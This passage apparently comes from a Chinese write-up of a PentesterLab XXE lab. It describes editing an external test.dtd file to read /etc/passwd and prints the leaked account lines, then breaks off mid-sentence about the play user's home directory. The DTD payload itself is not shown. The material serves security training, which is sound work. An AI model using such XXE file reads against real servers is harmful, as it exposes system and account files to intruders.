接下来就要通过编辑这个 test.dtd 来获得一些东西
再去访问的时候就能拿到 /etc/passwd 的信息
root:x:0:0:root:/root:/bin/sh
lp:x:7:7:lp:/var/spool/lpd...:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/false
tc:x:1001:50:Linux User,,,:/home/tc:/bin.../sh
pentesterlab:x:1000:50:Linux User,,,:/home/pentesterlab:/bin/sh
play:x:100:65534:Linux User,,,:/opt.../play-2.1.3/xxe/:/bin/false
mysql:x:101:65534:Linux User,,,:/home/mysql:/bin/false
可以发现,play 用户的家目录是